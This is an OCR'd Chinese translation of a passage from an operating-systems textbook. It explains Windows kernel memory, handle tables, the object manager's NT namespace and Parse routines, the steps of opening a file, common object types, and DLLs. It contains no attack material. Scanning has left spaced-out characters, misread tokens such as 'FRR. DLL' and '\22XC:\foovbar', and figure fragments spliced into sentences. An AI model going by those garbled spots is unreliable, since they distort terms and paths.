行 体 中 ， 人 允许 内 核 态 组件 不 仅 分 配 分 页 内 核 内 存 ， 也 分 配 无 分 页 内 核 内 存 。 对 于 那些 需要 被 具有 CPU 2 级 
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以 及 更 高 优先 级 的 对 象 访问 的 任何 数据 结构 和 内 核 态 对 象 ， 无 分 页 内 存 都 是 需要 的 。 这 包括 ISR 和 DPC (但 
不 包括 APC) 和 线程 调度 本 身 。 该 页 面 故 障 处 理 也 需要 由 无 分 页 内 核 内 存 分 配 的 数据 结构 ， 以 避免 递归 。 

大 部 分 来 自 内 核 堆 管理 器 的 分 配 ， 是 通过 使 用 每 个 处 理 器 后 备 名 单 来 获得 的 ， 这 个 后 备 名 单 中 包含 
分 配 大 小 一 致 的 LIFO 列 表 。 这 些 LIFO 优化 不 涉及 锁 的 运作 ， 可 提高 系统 的 性 能 和 可 扩展 性 。 

每 个 对 象 头 包含 一 个 配额 字段 ， 这 是 用 于 对 进程 访问 一 个 对 象征 收 配额 。 配 额 是 用 来 保持 用 户 使 用 
较 多 的 系统 资源 。 对 无 分 页 核心 内 存 (这 需要 分 配 物理 内 存 和 内 核 虚拟 地 址 ) 和 分 页 的 核心 内 存 (使 用 了 
内 核 虚拟 地 址 ) 有 不 同 的 限制 。 当 内 存 类 型 的 累积 费用 达到 了 配额 限制 ， 由 于 资源 不 足 而 导致 给 该 进程 的 
分 配 失败 。 内 存 管 理 器 也 正在 使 用 配额 来 控制 工作 集 的 大 小 和 线程 管理 器 ， 以 限制 CPU 的 使 用 率 。 

物理 内 存 和 内 核 虚 拟 地 址 都 是 宝贵 的 资源 。 当 一 个 对 象 不 再 需要 , 应 该 取消 并 回收 它 的 内 存 和 地 址 。 
但 是 ， 如 果 一 个 仍 在 被 使 用 的 对 象 收 到 新 的 请 求 ， 则 内 存 可 以 被 分 配给 另 一 个 对 象 ， 然 而 数据 结构 有 可 
能 被 损坏 。 在 Windows 执 行 体 中 很 容易 发 生 这 样 的 问题 ， 因 为 它 是 高 度 多 线程 的 ， 并 实施 了 许多 异步 操 
fe (例如 ， 在 完成 特定 数据 结构 之 上 的 操作 之 前 ， 就 返回 这 些 数据 结构 传递 给 函数 的 调用 者 ) 。 

为 了 避免 由 于 竞争 条 件 而 过 早 地 释放 对 象 ， 对 象 管理 器 实现 了 一 个 引用 计数 机 制 ， 以 及 引用 指针 的 
概念 。 需 要 一 个 参考 指针 来 访问 一 个 对 象 ， 即 便 是 在 该 物体 有 可 能 正 要 被 删除 时 。 根 据 每 一 个 特定 对 象 
类 型 有 关 的 协议 里 面 ， 只 有 在 某 些 时 候 一 个 对 象 才 可 以 被 另 一 个 线程 删除 。 在 其 他 时 间 使 用 的 锁 ， 数 据 
结构 之 间 的 依赖 关系 ， 甚 至 是 没有 其 他 线程 有 一 个 对 象 的 指针 ， 这 些 都 能 够 充分 保护 一 个 对 象 ， 使 其 避 
免 被 过 早 删除 。 

1. 句柄 

用 户 态 引用 内 核 态 对 象 不 能 使 用 指针 ， 因 为 它们 很 难 验证 。 相 反 内 核 态 对 象 必须 使 用 一 些 其 他 方式 
命名 ， 使 用 户 代码 可 以 引用 它们 。Windows 使 用 句柄 来 引 
用 内 核 态 对 象 。 句 柄 是 不 透明 值 (opaque value), 7 PIRRE A: 句柄 表 项 [512] 
透明 值 是 被 对 象 管理 器 转换 到 具体 的 应 用 ， 以 表示 一 个 
对 象 的 内 核 态 数据 结构 。 图 11-16 表 示 了 用 来 把 句柄 转换 
成 对 象 的 指针 的 句柄 表 的 数据 结构 。 句 柄 表 增 加 额外 的 
间接 层 来 扩展 。 每 个 进程 都 有 自己 的 表 ， 包 括 该 系统 的 
进程 ， 其 中 包含 那些 只 含有 内 核 线 程 与 用 户 态 进程 不 相 
关 的 进程 。 

图 11-17 显 示 ， 句 柄 表 最 大 支持 两 个 额外 的 间接 层 。 图 11-16 使 用 一 个 单独 页 达到 512 个 句柄 的 
这 使 得 在 内 核 态 中 执行 代码 能 够 方便 地 使 用 句柄 ， 而 不 最 小 表 的 句柄 表 数 据 结构 
是 引用 指针 。 内 核 句 柄 都 是 经 过 特殊 编码 的 ， 从 而 它们 
能 够 与 用 户 态 的 句柄 区 分 开 。 内 核 句 柄 都 保存 在 系统 进程 的 句柄 表 里 ， 而 且 不 能 以 用 户 态 存 取 。 就 像 大 
部 分 内 核 虚 拟 地 址 空间 被 所 有 进程 共享 ， 系 统 句柄 表 由 所 有 的 内 核 成 分 共享 ， 无 论 当前 的 用 户 态 进程 是 
什么 。 





句柄 表 描 述 符 D: 句柄 表 指 针 [32] 





图 11-17 最 多 达到 1600 万 个 句柄 的 句柄 表 数 据 结构 
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用 户 可 以 通过 Win32 调 用 的 CreateSemaphore 或 OpenSemaphore 来 创建 新 的 对 象 或 打开 一 个 已 经 
存在 的 对 象 。 这 些 都 是 对 程序 库 的 调用 ， 并 且 最 后 会 转向 适当 的 系统 调用 。 任 何 成 功 创建 或 打开 对 象 的 
指令 的 结果 ， 都 是 储存 在 内 核 内 存 的 进程 入 有 句柄 表 的 一 个 64 位 句柄 表 入 口 。 表 中 句柄 逻辑 位 置 的 32 位 
索引 返回 给 用 户 用 于 随后 的 指令 。 内 核 的 64 位 句柄 表 入 口 包含 两 个 32 位 字 节 。 一 个 字 节 包含 29 位 指针 指 
向 对 象 。 其 后 的 3 位 作为 标志 〈 例 如 ， 表 示 句 柄 是 否 被 它 创建 的 进程 继承 ) 。 这 3 位 在 指针 就 位 以 前 是 被 
屏蔽 掉 的 。 其 他 的 字 节 包含 一 个 32 位 正确 掩 码 。 这 是 必需 的 因为 只 有 在 对 象 创建 或 打开 的 时 候 许可 校 验 
才 会 进行 。 如 果 一 个 进程 对 某 对 象 只 有 只 读 的 权限 ， 那 在 表示 其 他 在 掩 码 中 的 权限 位 都 为 0， 从 而 让 操 
作 系 统 可 以 拒绝 除 读 之 外 对 对 象 进行 任何 其 他 的 操作 。 

2. 对 象 名 字 空 间 

进程 可 以 通过 由 一 个 进程 把 到 对 象 的 句柄 复制 给 其 他 进程 来 共享 对 象 。 但 是 这 要 求 复制 进程 有 其 他 
进程 的 句柄 ， 而 这 样 在 多 数 情况 中 并 不 适用 ， 例 如 进程 共享 的 对 象 是 无 关 的 或 被 其 他 进程 保护 的 。 在 其 
他 情况 下 ， 对 象 即使 在 不 被 任何 进程 调用 的 时 候 仍 然 保 持 存在 是 非常 重要 的 ， 例 如 表示 物理 设备 的 对 象 ， 
或 用 户 实现 对 象 管理 器 和 它 自己 的 NT 名 字 空 间 的 对 象 。 为 了 地 址 的 全 面 分 享 和 持久 化 需求 ， 对 象 管 理 
允许 随意 的 对 象 在 被 创建 的 时 候 就 给 定 其 NT 名 字 空 间 中 的 名 字 。 然 而 ， 是 由 执行 部 件 控制 特定 类 型 的 
对 象 来 提供 接口 ， 以 使 用 对 象 管 理 器 的 命名 功能 。 

NT 名 字 空 间 是 分 级 的 ， 借 由 对 象 管理 器 实现 目录 和 特征 连接 。 名 字 空 间 也 是 可 扩展 的 ， 通 过 提供 
一 个 叫 作 Parse 的 进程 程序 允许 任何 对 象 类 型 指定 名 字 空 间 扩展 。Parse 程 序 是 一 个 可 以 提供 给 每 一 个 对 
象 类 型 的 对 象 创建 时 使 用 的 程序 ， 如 图 11-18 所 示 。 










| open | 用 于 每 个 新 的 句柄 |e 
| Pase | 用 于 扩展 名 字 空 间 的 对 象 类 型 | 用 于 文件 和 注册 表 键 | 





得 到 对 象 名 称 
图 11-18 用 于 指定 一 个 新 对 象 类 型 的 对 象 语句 

Open 语 句 很 少 使 用 ， 因 为 默认 对 象 管理 器 的 行为 才 是 必需 的 ， 所 以 程序 为 所 有 基本 对 象 类 型 指定 
为 NULL。 

Close 和 Delete 语 句 描述 对 象 完成 的 不 同 阶段 。 当 对 象 的 最 后 一 个 句柄 关闭 ， 可 能 会 有 必要 的 动作 清 
空 状态 ， 这 些 由 Close 语 句 来 执行 ， 当 最 后 的 指针 参考 从 对 象 移 除 ， 使 用 Delete 语 句 ， 从 而 对 象 可 以 准备 
被 删除 并 使 其 内 存 可 以 重用 。 利 用 文件 对 象 ， 这 两 个 语句 都 实现 为 IO 管理 器 里 面 的 回调 ，LIO 管 理 器 是 
声明 了 对 象 类 型 的 组 件 。 对 象 管理 操作 使 得 由 设备 堆栈 发 送 的 IO 操作 能 够 与 文件 对 象 关 联 上 ， 而 大 多 
数 这 些 工 作 由 文件 系统 完成 。 

Parse 语 句 用 来 打开 或 创建 对 象 ， 如 文件 和 登录 密码 ， 以 及 扩展 NT 名 字 空 间 。 当 对 象 管理 器 试图 通 
过 名 称 打开 一 个 对 象 并 遇 到 其 管理 的 名 字 空 间 树 的 叶 结 点 ， 它 检查 该 叶 结 点 对 象 类 型 是 否 指定 了 一 个 
Parse 语 句 。 如 果 有 ， 它 会 引用 该 语句 ， 将 路 径 名 中 未 用 的 部 分 传 给 它 。 再 以 文件 对 象 为 例 ， 叶 子 结 点 是 
一 个 表现 特定 文件 系统 卷 的 设备 对 象 。Parse 语 句 由 IO 管理 器 执行 ， 并 发 起 在 对 文件 系统 的 IO 操作 ， 以 
填充 一 个 指向 文件 的 公开 实例 到 该 文件 对 象 ， 这 个 文件 是 由 路 径 名 指定 的 。 我 们 将 在 以 后 逐步 探索 这 个 
特殊 的 实例 。 

QueryName 语 句 是 用 来 查找 与 对 象 关 联 的 名 字 。Security 语 句 用 于 得 到 、 设 置 或 删除 该 安全 描述 符 
的 对 象 。 对 于 大 多 数 类 型 的 对 象 ， 此 程序 在 执行 的 安全 引用 监视 器 组 件 里 提供 一 个 标准 的 切入 点 。 

注意 在 图 11-18 里 的 语句 并 不 执行 每 种 对 象 类 型 最 感 兴趣 的 操作 ， 例 如 在 文件 上 的 读 或 写 (或 者 对 
于 信号 量 的 增加 或 减少 )。 相 反 ， 这 些 程序 提供 给 对 象 管理 器 正确 实现 功能 所 需要 的 回调 函数 ， 如 提供 
对 对 象 的 访问 和 对 象 完成 时 的 清理 工作 。 这 些 对 象 由 于 有 了 可 以 操作 其 拥有 的 数据 结构 的 API 而 变 得 十 
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分 有 用 。 例 如 一 些 系 统 调用 ，NtReadEFile 和 NtWriteFile 都 利用 由 对 象 管理 器 创建 的 句柄 表 将 句柄 转化 为 
基础 对 象 的 引用 指针 (例如 一 个 文件 对 象 ) ， 这 些 基础 对 象 包 含 了 实现 相关 系统 调用 所 需要 的 数据 。 

除了 这 些 对 象 类 型 的 回调 ， 对 象 管理 器 还 提供 了 一 套 通用 对 象 例 程 ， 例 如 创建 对 象 和 对 象 类 型 、 复 
制 句柄 、 从 句柄 或 者 名 字 获 得 引用 指针 ， 以 及 增加 和 减 去 对 象 头 部 的 参考 计数 。 此 外 还 有 一 个 通用 的 用 
于 关闭 所 有 类 型 句柄 的 函数 NtClose。 

虽然 对 象 名 字 空 间 对 整个 运作 的 系统 是 至 关 重 要 的 ， 但 却 很 少 有 人 知道 它 的 存在 ， 因 为 没有 特殊 的 
浏览 工具 的 话 它 对 用 户 是 不 可 见 的 。winobj 就 是 一 个 这 样 的 浏览 工具 ， 在 www.microsoft.com/technet/ 
sysinternals 可 免费 获得 。 在 运行 时 ， 此 工具 描绘 的 对 象 的 名 字 空 间 通 常 包含 对 象 目录 ， 如 图 11-19 列 出 来 
的 及 其 他 一 些 。 







内 容 









ObjectTypes 







安全 系统 的 对 象 
较 早 开启 和 一 直 开启 的 关键 共享 库 


图 11-19 在 对 象 名 字 空间 中 的 一 些 典 型 目录 


一 个 被 奇怪 地 命名 为 \?? 的 目录 包含 用 户 的 所 有 MS-DOS 类 型 的 设备 名 称 ， 如 A: 表示 软驱 ，C: K 
示 第 一 块 硬盘 。 这 些 名 称 其 实 是 在 设备 对 象 活跃 的 地 方 链接 到 目录 \ 装 置 的 符号 。 使 用 名 称 \?? 是 因为 其 
按 字母 顺序 排列 第 一 ， 以 加 快 查询 从 驱动 器 盘 符 开始 的 所 有 路 径 名 称 。 其 他 的 对 象 目录 的 内 容 应 该 是 自 
解释 的 。 

如 上 所 述 ， 对 象 管理 器 保持 一 个 单独 的 句柄 为 每 个 对 象 计 数 。 这 个 计数 是 从 来 不 会 大 于 指针 引用 计 
数 ， 因 为 每 个 有 效 的 句柄 对 象 在 它 的 句柄 表 人 和 人口 有 一 个 引用 指针 。 使 用 单独 句柄 计数 的 理由 是 ， 当 最 后 
一 个 用 户 态 的 引用 消失 的 时 候 ， 许 多 类 型 的 对 象 可 能 需要 清理 自己 的 状态 ， 尽管 它 们 尚未 准备 好 让 它们 
的 内 存 删除 。 

以 一 个 文件 对 象 为 例 表 示 一 个 打开 文件 的 实例 。Windows 系 统 中 文件 被 打开 以 供 独 占 访问 。 当 文件 
对 象 的 最 后 一 个 句柄 被 关闭 ， 重 要 的 是 在 那 一 刻 就 应 该 删除 专 有 访问 ， 而 不 是 等 待 任何 内 核 引 用 最 终 消 
失 (例如 ， 在 最 后 一 次 从 内 存 冲 洗 数据 之 后 。) 否则 ， 从 用 户 态 关闭 并 重新 打开 一 个 文件 可 能 无 法 按 预 
期 的 方式 工作 ， 因 为 该 文件 看 来 仍然 在 使 用 中 。 

虽然 对 象 管理 器 在 内 核 具 有 全 面 的 管理 机 制 来 管理 内 核 中 的 对 象 生命 周期 ， 不 论 是 NT API 或 Win32 
API 的 都 没有 提供 一 个 引用 机 制 来 处 理 在 用 户 态 的 并 行 多 线程 之 间 的 句柄 使 用 。 从 而 多 线程 并 发 访问 句 
柄 会 带 来 竞争 条 件 (race condition) 和 bug， 例如， 可 能 发 生 一 个 线程 在 别 的 线程 使 用 完 特定 的 句柄 之 
前 就 把 它 关 闭 了 。 或 者 多 次 关闭 一 个 句柄 。 或 者 关闭 另 一 个 线程 仍然 在 使 用 的 句柄 ， 然 后 重新 打开 它 指 
向 不 同 的 对 象 。 

也 许 Windows 的 API 应 该 被 设计 为 每 个 类 型 对 象 带 有 一 个 关闭 API， 而 不 是 单一 的 通用 NTClose 操 
作 。 这 将 至 少 会 减少 由 于 用 户 态 线程 关闭 了 错误 的 处 理 而 发 生 错 误 的 频率 。 另 一 个 解决 办 法 可 能 是 在 句 
柄 表 中 的 指针 之 外 再 添加 一 个 序列 域 。 

为 了 帮助 程序 开发 人 员 在 他 们 的 程序 中 寻找 这 些 类 似 的 问题 ，Windows 有 一 个 应 用 程序 验证 ， 软 件 
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开发 商 能 够 从 Microsoft 下 载 。 我 们 将 在 11.7 节 介绍 类 似 的 驱动 程序 的 验证 器 ， 应 用 程序 验证 器 通过 大 量 
的 规则 检查 来 帮助 程序 员 寻 找 可 能 通过 普通 测试 无 法 发 现 的 错误 。 它 也 可 以 为 句柄 释放 列表 启用 先进 先 
出 顺序 ， 以 便 句 柄 不 会 被 立即 重用 ( 即 关闭 句柄 表 通 常 采用 效果 较 好 的 LIFO 排 序 )。 防 止 句柄 被 立即 重 
用 的 情况 发 生 ， 在 这 些 转化 的 情况 下 操作 可 能 错误 地 使 用 一 个 已 经 关闭 的 句柄 ， 这 是 很 容易 检测 到 的 。 

该 设备 对 象 是 执行 体 中 一 个 最 重要 的 和 贯穿 内 核 态 的 对 象 。 该 类 型 是 由 IO 管理 器 指定 的 ，LIO 管 理 
器 和 设备 驱动 是 设备 对 象 的 主要 使 用 者 。 设 备 对 象 和 驱动 程序 是 密切 相关 的 ， 每 个 设备 对 象 通常 有 一 个 
链接 指向 一 个 特定 的 驱动 程序 对 象 ， 它 描述 了 如 何 访问 设备 驱动 程序 所 对 应 的 IO 处 理 例 程 。 

设备 对 象 代表 硬件 设备 、 接 日 和 总 线 ， 以 及 逻辑 磁盘 分 区 、 磁 盘 卷 甚至 文件 系统 、 扩 展 内 核 ， 例 如 
防 病毒 过 滤器 。 许 多 设备 驱动 程序 都 有 给 定 的 名 称 ， 这 样 就 可 以 访问 它们 ， 而 无 需 打 开设 备 的 实例 的 句 
柄 ， 如 在 UNIX 中 。 我 们 将 利用 设备 对 象 以 说 明 Parse 程 序 是 如 何 被 使 用 的 ， 如 图 11-20 所 示 。 











ma) 
NtCreateFile(\??\C:\foo\bar) 





; ; DEVICE OBJECT: ; 
(5) y loCallDriver : for C: Volume 


ac S00 全 
NtfsCreateFile() |loCompleteRequest :SYMLINK: : 


;MDevices\Harddisk1 ; 


a) b) 
图 11-20 IJO 和 对 象 管理 器 创建 /打开 文件 并 返回 文件 句柄 的 步骤 


1) 当 一 个 执行 体 组 件 (如 实现 了 本 地 系统 调用 NTCreateFile 的 IO 管理 器 ) 调用 对 象 管理 器 中 的 
ObOpenObjectByName 时 ， 它 发 送 一 个 NT 名 字 空 间 的 Unicode 路 径 名 ， 例 如 \22XC:\foovbar。 

2) 对 象 管理 器 通过 目录 和 符号 链接 表 搜 索 并 最 终 认定 ?MC: 指 的 是 设备 对 象 (IO 管理 器 定义 的 一 
个 类 型 ) 。 该 设备 对 象 在 由 对 象 管理 器 管理 的 NT 名 字 空 间 中 一 个 叶 节点 。 

3) 然后 对 象 管理 器 为 该 对 象 类 型 调用 Parse 程 序 ， 这 恰好 是 由 IO 管理 器 实现 的 lopParseDevice。 它 
不 仅 传递 一 个 指针 给 它 发 现 的 设备 对 象 (C: ) ， 而 且 还 把 剩 下 的 字符 串 \foo\bar 也 ,发 送 过 去 。 

4) IO 管理 器 将 创建 一 个 IRP (IO 请 求 包 ) ， 分 配 一 个 文件 对 象 ， 发 送 请 求 到 由 对 象 管理 器 确定 的 
设备 对 象 发 现 的 IO 设备 堆栈 。 

5) IRP 是 在 IO 堆栈 中 逐 级 传递 ， 直 到 它 到 达 一 个 代表 文件 系统 C: 实例 的 设备 对 象 。 在 每 一 个 阶段 ， 
控制 是 通过 一 个 与 这 一 等 级 设备 对 象 相连 的 切入 点 传递 到 驱动 对 象 内 部 。 切 入 点 用 在 这 种 情况 下 ， 是 为 
了 支持 CREATE 操 作 ， 因 为 要 求 是 创建 或 打开 一 个 名 为 \foo\bar 的 文件 。 

6) 该 设备 对 象 中 遇 到 指向 文件 系统 的 IRP 可 以 表示 为 文件 系统 筛选 驱动 程序 ， 这 可 能 在 该 操作 到 达 对 
应 的 文件 系统 设备 对 象 之 前 修改 1O 操 作 。 通 常情 况 下 这 些 中 间 设 备 代 表 系 统 扩展 ， 例 如 反 病 毒 过 滤器 。 

7) 文件 系统 设备 对 象 有 一 个 到 文件 系统 驱动 程序 对 象 ( 如 NTFS) 的 链接 。 因 此 ， 驱 动 对 象 包含 
NTFS 内 创建 操作 的 地 址 范围 。 

8) NTFS 将 填补 该 文件 中 的 对 象 并 将 它 返 回 到 IO 管理 器 ，IO 管 理 器 备份 堆栈 中 的 所 有 设备 ， 直 到 
lopParseDevice 返 回 对 象 管理 器 (如 11.8 节 所 述 ) 。 

9) 在 对 象 管理 器 以 其 名 字 空 间 中 的 查找 结束 。 它 从 Parse 程 序 收 到 一 个 初始 化 对 象 (这 正好 是 一 个 
文件 对 象 ， 而 不 是 原来 对 象 发 现 的 设备 对 象 ) 。 因 此 ， 对 象 管理 器 为 文件 对 象 在 目前 进程 的 句柄 表 里 创 





C: 的 设备 堆栈 
(7) 
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建 了 一 个 句柄 ， 并 对 需求 者 返回 句柄 。 

10) 最 后 一 步 是 返回 用 户 态 的 调用 者 ， 在 这 个 例子 里 就 是 Win32 API CreateFile， 它 会 把 句柄 返 回 
给 应 用 程序 。 

可 执行 组 件 能 够 通过 调用 ObCreateObjectType 接 口 给 对 象 管理 器 来 动态 创建 新 的 类 型 。 由 于 每 次 
发 布 都 在 变化 ， 所 以 没有 一 个 限定 的 对 象 类 型 定义 表 。 图 11-21 列 出 了 在 Windows 中 非常 通用 的 一 些 对 象 
类 型 ， 供 快速 参考 。 


| Process | 






描 述 
| Murex | 用 来 控制 进入 关键 区 域 的 二 进 制 信 号 量 


具有 持久 状态 (已 标记 信号 \ 未 标记 信号 ) 的 同步 对 象 






Event 


内 部 进程 消息 传递 的 机 制 








| Queue | 用 来 完成 异步 /0 通知 的 对 象 






| Section | 表述 映射 的 文件 的 对 象 | 
注册 表 关 键 字 ， 用 于 把 注册 信息 关联 到 某 个 对 象 管理 名 字 空 间 
物理 设备 、 总 线 、 驱 动 或 者 卷 实例 的 1/O 设 备 对 象 


图 11-21 对 象 管理 器 管理 的 一 些 通 用 可 执行 对 象 类 型 


进程 (process) 和 线程 (thread) 是 明显 的 。 每 个 进程 和 每 个 线程 都 有 一 个 对 象 来 表示 ， 这 个 对 象 
包含 了 管理 进程 或 线程 所 需 的 主要 属性 。 接 下 来 的 三 个 对 象 : 信号 量 、 互 斥 体 和 事件 ， 都 可 以 处 理 进 程 
间 的 同步 。 信 号 量 和 互 斥 体 按 预期 方式 工作 ， 但 都 需要 额外 的 响 铃 和 警 哨 〈 例 如 ， 最 大 值 和 超时 设 定 ) 。 
事件 处 于 两 种 状态 之 一 : 已 标记 信号 或 未 标记 信号 。 如 果 一 个 线程 等 待 事件 处 于 已 标记 信号 状态 ， 线 程 
被 立即 释放 。 如 果 该 事件 是 未 标记 信号 状态 ， 它 会 一 直 阻 塞 直到 一 些 其 他 线程 通知 该 事件 ， 这 将 释放 所 
有 被 阻塞 的 线程 (通知 事件 ) 或 只 是 释放 掉 第 一 个 被 阻塞 的 线程 (同步 事件 )。 也 可 以 设置 一 个 事件 ， 
这 样 一 种 信号 成 功 等 待 后 ， 它 会 自动 恢复 到 该 未 标记 信号 的 状态 而 不 是 处 在 已 标记 信号 状态 。 

端口 、 定 时 器 和 队列 对 象 也 与 通信 和 同步 相关 。 端 口 是 进 程 之 间 交 换 LPC 消 息 的 通道 。 定 时 器 提供 
一 种 在 特定 的 时 间 区 间 内 阻塞 的 方法 。 队 列 (在 内 部 被 称 为 KQUEUES) 用 于 通知 线程 已 完成 以 前 启动 
的 异步 IO 操作 ， 或 一 个 端口 有 消息 等 待 。( 它 们 被 设计 来 管理 应 用 程序 中 的 并 发 的 水 平 ， 以 及 在 高 性 
能 多 处 理 器 应 用 中 使 用 ， 如 SQL ) 。 ， 

当 一 个 文件 被 打开 时 ，Open file 对 象 将 会 被 创建 。 没 打开 的 文件 ， 并 没有 对 象 由 对 象 管理 器 管理 。 
访问 令 牌 是 安全 的 对 象 。 它 们 识别 用 户 ， 并 指出 用 户 具 有 什么 样 的 特权 ， 如 果 有 的 话 。 配 置 文件 是 线程 
的 用 于 存储 程序 计数 器 的 正在 运行 的 周期 样本 的 数据 结构 ， 用 以 确定 程序 线程 的 时 间 是 花 在 哪些 地 方 了 。 

段 用 来 表示 内 存 对 象 ， 这 些 内 存 对 象 可 以 被 应 用 程序 向 内 存 管理 器 请 求 ， 将 应 用 程序 的 地 址 空间 映 
射 到 这 个 区 域 中 来 。 它 们 记录 表示 磁盘 上 的 内 存 对 象 的 页 的 文件 (或 页 面 文件 ) 的 段 。 键 表示 的 是 对 象 
管理 名 字 空 间 的 注册 表 名 字 空 间 的 加 载 点 。 通 常 只 有 一 个 名 为 \REGISTRY 关 键 对 象 ， 负 责 链接 到 注册 表 
键 值 和 NT 名 字 空 间 的 值 。 

对 象 目录 和 符号 链接 完全 是 本 地 对 象 管理 器 的 NT 名 字 空 间 的 一 部 分 。 它 们 类 似 于 和 它们 对 应 的 文 
件 系统 部 分 : 目录 人 允许 相关 的 对 象 被 收集 起 来 。 符 号 链接 允许 对 象 名 字 空 间 来 引用 一 个 对 象 名 字 空 间 的 
不 同 部 分 中 的 对 象 的 一 部 分 的 名 称 。 
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每 个 已 知 的 操作 系统 的 设备 有 一 个 或 多 个 设备 对 象 包含 有 关 它 的 信息 ， 并 且 由 系统 引用 该 设备 。 最 
后 ， 每 个 已 加 载 设备 驱动 程序 在 对 象 空间 中 有 一 个 驱动 程序 对 象 。 驱 动 程序 对 象 被 所 有 那些 表示 被 这 些 
驱动 控制 的 设备 的 实例 共享 。 

其 他 没有 介绍 的 对 象 有 更 多 特别 的 目的 ， 如 同 内 核 事 务 的 交互 或 Win32 线 程 池 的 工作 线程 工厂 交互 。 


11.3.4 FRR. DLL 和 用 户 态 服务 

回 到 图 11-4， 我 们 可 以 看 到 Windows 操 作 系 统 是 由 内 核 态 中 的 组 件 和 用 户 态 的 组 件 组 成 的 。 现在 
我 们 已 经 介绍 完了 我 们 的 内 核 态 组 件 ， 接 下 来 看 看 用 户 态 组 件 。 其 中 对 于 Windows 有 三 种 组 件 尤 为 重 
要 : 环境 子 系统 、DLL 和 服务 进程 。 

我 们 已 介绍 了 Windows 子 系统 模型 ， 所 以 这 里 不 作 更 多 详细 介绍 ， 而 主要 是 关注 原始 设计 的 NT， 
子 系统 被 视 为 一 种 利用 内 核 态 运行 相同 底层 软件 来 支持 多 个 操作 系统 个 性 化 的 方法 。 也 许 这 是 试图 避免 
操作 系统 竞争 相同 的 平台 ,例如 在 DEC 的 VAX 上 的 VMS 和 Berkeley UNIX。 或 者 也 许 在 微软 没有 人 知道 
OS/2 是 否 会 成 为 一 个 成 功 的 编程 接口 ， 他 们 加 上 了 他 们 的 投注 。 结 果 ，OS/2 成 为 无 关 的 后 来 者 ， 而 
Win32 API 设计 为 与 Windows 95 结 合并 成 为 主导 。 

Windows 用 户 态 设计 的 第 二 个 重要 方面 是 在 动态 链接 库 (DLL)， 即 代码 是 在 程序 运行 的 时 候 完成 
的 链接 ， 而 非 编 译 时 。 共 享 的 库 不 是 一 个 新 的 概念 ， 最 现代 化 的 操作 系统 使 用 它们 。 在 Windows 中 几 
平 所 有 库 都 是 DLL， 从 每 一 个 进程 都 装载 的 系统 库 ntdll.dll 到 引 在 允许 应 用 程序 开发 人 员 进 行 代码 通用 的 
功用 函数 的 高 层 程序 库 。 

DLL 通 过 允许 在 进程 之 间 共 享 通用 代码 来 提高 系统 效率 ， 保 持 常 用 代码 在 内 存 中 ， 处 理 减 少 从 程序 
磁盘 到 内 存 中 的 加 载 时 间 ， 并 允许 操作 系统 的 库 代 码 进行 更 新 时 无 需 重 新 编译 或 重新 链接 所 有 使 用 它 的 
应 用 程序 ， 从 而 提高 系统 的 使 用 能 力 。 

此 外 ， 共 享 的 库 引 入 版 本 控制 的 问题 ， 并 增加 系统 的 复杂 性 ， 因 为 为 帮助 某 些 特定 的 应 用 而 引入 的 
更 改 可 能 会 给 其 他 的 一 些 特定 的 应 用 带 来 可 能 的 错误 ， 或 者 因为 实现 的 改变 而 破坏 了 一 些 其 他 的 应 用 一 一 
这 是 一 个 在 Windows 世 界 称 为 DLL 地 狱 的 问题 。 

DLL 的 实现 在 概念 上 是 简单 的 。 并 非 直 接 调用 相同 的 可 执行 映像 中 的 子 例 程 的 代码 ， 一 定 程度 的 
间接 性 引用 被 编译 器 引入 : TAT (导入 地 址 表 )。 当 可 执行 文件 被 加 载 时 ， 它 查找 也 必须 加 载 的 DLL 的 列 
表 (这 将 是 一 个 图 结构 ， 因 为 这 些 DLL 本 身 会 指定 它们 所 需要 的 其 他 的 DLL 列表 ) 。 所 需 的 DLL 被 加 载 
并 填写 好 它们 的 IAT。 

现实 是 更 复杂 的 。 另 一 个 问题 是 代表 DLL 之 间 的 关系 图 可 以 包含 环 ， 或 具有 不 确定 性 行为 ， 因 此 计 
算 要 加 载 的 DLL 列 表 可 以 导致 不 能 运行 的 结果 。 此 外 ， 在 Windows 中 DLL 代码 库 有 机 会 来 运行 代码 ， 只 
要 它们 加 载 到 了 进程 中 或 者 创建 一 个 新 线程 。 通 常 ， 这 是 使 它们 可 以 执行 初始 化 ， 或 为 每 个 线程 分 配 存 
储 空间 ， 但 许多 DLL 在 这 些 附加 例 程 中 执行 大 量 的 计算 。 如 果 任 何 函数 调用 的 一 个 附加 例 程 需要 检查 加 
载 的 DLL 列表 ， 死 锁 可 能 会 发 生 在 这 个 过 程 。 

DLL 用 于 不 仅仅 用 于 共享 常见 的 代码 ， 它 们 还 可 以 启用 一 种 宿主 的 扩展 应 用 程序 模型 。Internet 
Explorer 可 以 下 载 并 链接 到 DLL 调用 ActiveX 控件 。 另 一 端 互 联网 的 Web 服务 器 也 加 载 动态 代码 ， 以 为 
它们 所 显示 的 网 页 产生 更 好 的 Web 体 验 。 像 Microsoft Office 的 应 用 程序 允许 链接 并 运行 DLL， 使 得 Office 可 
以 类 似 一 个 平台 来 构建 新 的 应 用 程序 。COM (组 件 对 象 模型 ) 编程 模式 允许 程序 动态 地 查找 和 加 载 编写 
来 提供 特定 发 布 接口 的 代码 ， 这 就 导致 几乎 所 有 使 用 COM 的 应 用 程序 都 以 in-process 的 方式 来 托管 DLL, 

所 有 这 类 动态 加 载 的 代码 都 为 操作 系统 带 来 了 更 大 的 复杂 性 ， 因 为 程序 库 的 版 本 管理 不 是 只 为 可 执 
行 体 匹配 对 应 版 本 的 DLL， 而 是 有 时 把 多 个 版 本 的 同一 个 DLL 加 载 到 进程 中 一 一 Microsoft 称 之 为 肩 并 肩 
(side-by-side) 。 单 个 的 程序 可 以 承载 两 个 不 同 的 DLL， 每 个 可 能 要 加 载 同一 个 Windows 库 ， 但 对 该 库 的 
版 本 有 不 同 要 求 。 

较 好 的 解决 方案 是 把 代码 放 到 独立 的 进程 里 。 而 在 进程 外 承载 的 代码 结果 具有 较 低 的 性 能 ， 并 在 很 
多 情况 下 会 带 来 一 个 更 复杂 的 编程 模型 。 微 软 尚 未 提供 在 用 户 态 下 来 处 理 这 种 复杂 度 的 一 个 好 的 解决 办 
法 。 但 这 让 人 对 相对 简单 的 内 核 态 产生 了 希望 。 

该 内 核 态 具有 较 小 的 复杂 性 ， 是 因为 它 相 对 于 用 户 态 提供 了 更 少 的 对 外 部 设备 驱动 模型 的 支持 。 
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在 Windows 中 , 系统 功能 的 扩展 是 通过 编写 用 户 态 服务 来 实现 的 。 这 对 于 子 系统 运行 得 很 好 ， 并 且 在 只 
